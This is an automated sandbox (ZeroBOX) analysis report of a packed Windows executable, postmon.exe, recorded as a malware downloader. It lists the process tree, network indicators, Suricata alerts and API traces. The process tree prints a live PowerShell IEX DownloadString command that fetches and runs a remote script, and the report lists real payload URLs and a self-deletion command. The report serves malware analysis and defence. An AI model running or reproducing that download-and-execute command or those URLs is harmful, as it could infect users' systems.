Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	July 28, 2023, 5:22 p.m.	July 28, 2023, 5:36 p.m.

Size	490.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`8bdd901591eb90456ad781e3c79bb4ad`
SHA256	`0862c633fcfd3a8e2e1a27e862845e98edc229ab892f3b6dde5184a3217f861f`
CRC32	`63540208`
ssdeep	`6144:smeQ8DZA76JirPX2xy1AOC5N6EsVHCJxXyIHIvSw0rKZgs93ACdLYfRkZlWRm:srQii7gG3EsVxsIvHggRYJkom`
Yara	UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Malicious_Packer_Zero - Malicious Packer IsPE32 - (no description)

postmon.exe "C:\Users\test22\AppData\Local\Temp\postmon.exe"
1460
- cmd.exe "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('http://elturky.net/ERP/public/js/debug2.ps1')"
  2140
  - powershell.exe powershell -command IEX(New-Object Net.Webclient).DownloadString('http://elturky.net/ERP/public/js/debug2.ps1')
    2220
- cmd.exe "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
  2308
  - PING.EXE ping 127.0.0.1
    2372

Name	Response	Post-Analysis Lookup
elturky.net	A 68.178.227.97	68.178.227.97

IP Address	Status	Action
164.124.101.2	Active	Moloch
38.180.1.27	Active	Moloch
68.178.227.97	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49169 -> 68.178.227.97:80	2032162	ET INFO PS1 Powershell File Request	Potentially Bad Traffic
TCP 192.168.56.103:49162 -> 68.178.227.97:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49162 -> 68.178.227.97:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49162 -> 68.178.227.97:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49162 -> 68.178.227.97:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 28, 2023, 5:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 28, 2023, 5:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 28, 2023, 5:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 28, 2023, 5:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 28, 2023, 5:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 28, 2023, 5:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 28, 2023, 5:15 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 28, 2023, 5:15 p.m.			0	0

Command line console output was observed (20 events)

Time & API	Arguments	Status	Return
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: Pinging 127.0.0.1 console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: with 32 bytes of data: console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), console_handle: 0x00000007	1	1
WriteConsoleA July 28, 2023, 5:22 p.m.	buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000138db0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001bdef0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001bdef0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001bdef0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be190 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be190 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be200 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be200 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be200 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be200 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be430 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be430 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be430 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001bdf60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001bdf60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001bdf60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be2e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be2e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be2e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be2e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be2e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be2e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be2e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be2e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be890 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be890 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be890 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001bdf60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001bdf60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be9e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001be9e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001bdf60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001bdf60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001bdf60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000116af0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000116af0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000116af0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000116af0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b659d50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b659d50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000113330 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000113330 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000113330 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 28, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000113330 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 28, 2023, 5:14 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.gfids

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AFX_DIALOG_LAYOUT

Powershell script has download & invoke calls (1 event)

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (10 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://elturky.net/ERP/public/js/dd_64.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://elturky.net/ERP/public/js/cc2.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://elturky.net/ERP/public/js/cc3.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://elturky.net/ERP/public/js/cc4.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://elturky.net/ERP/public/js/cc5.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://elturky.net/ERP/public/js/cc1.php
suspicious_features	GET method with no useragent header	suspicious_request	GET http://elturky.net/ERP/public/js/cc2.php
suspicious_features	GET method with no useragent header	suspicious_request	GET http://elturky.net/ERP/public/js/cc3.php
suspicious_features	GET method with no useragent header	suspicious_request	GET http://elturky.net/ERP/public/js/debug2.ps1
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://38.180.1.27/index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=HnTgSX1R

Performs some HTTP requests (10 events)

request	GET http://elturky.net/ERP/public/js/dd_64.exe
request	GET http://elturky.net/ERP/public/js/cc2.exe
request	GET http://elturky.net/ERP/public/js/cc3.exe
request	GET http://elturky.net/ERP/public/js/cc4.exe
request	GET http://elturky.net/ERP/public/js/cc5.exe
request	GET http://elturky.net/ERP/public/js/cc1.php
request	GET http://elturky.net/ERP/public/js/cc2.php
request	GET http://elturky.net/ERP/public/js/cc3.php
request	GET http://elturky.net/ERP/public/js/debug2.ps1
request	GET http://38.180.1.27/index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=HnTgSX1R

Allocates read-write-execute memory (usually to unpack itself) (50 out of 213 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 2424832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002840000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35b1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef382e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef382e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef382f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef382f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef382f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef382f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef382f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef382f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef382f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef382f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3830000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3830000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3830000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3830000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3830000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3831000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3831000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3831000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3831000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef382e000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00022000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00023000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00024000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00112000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00025000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00160000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
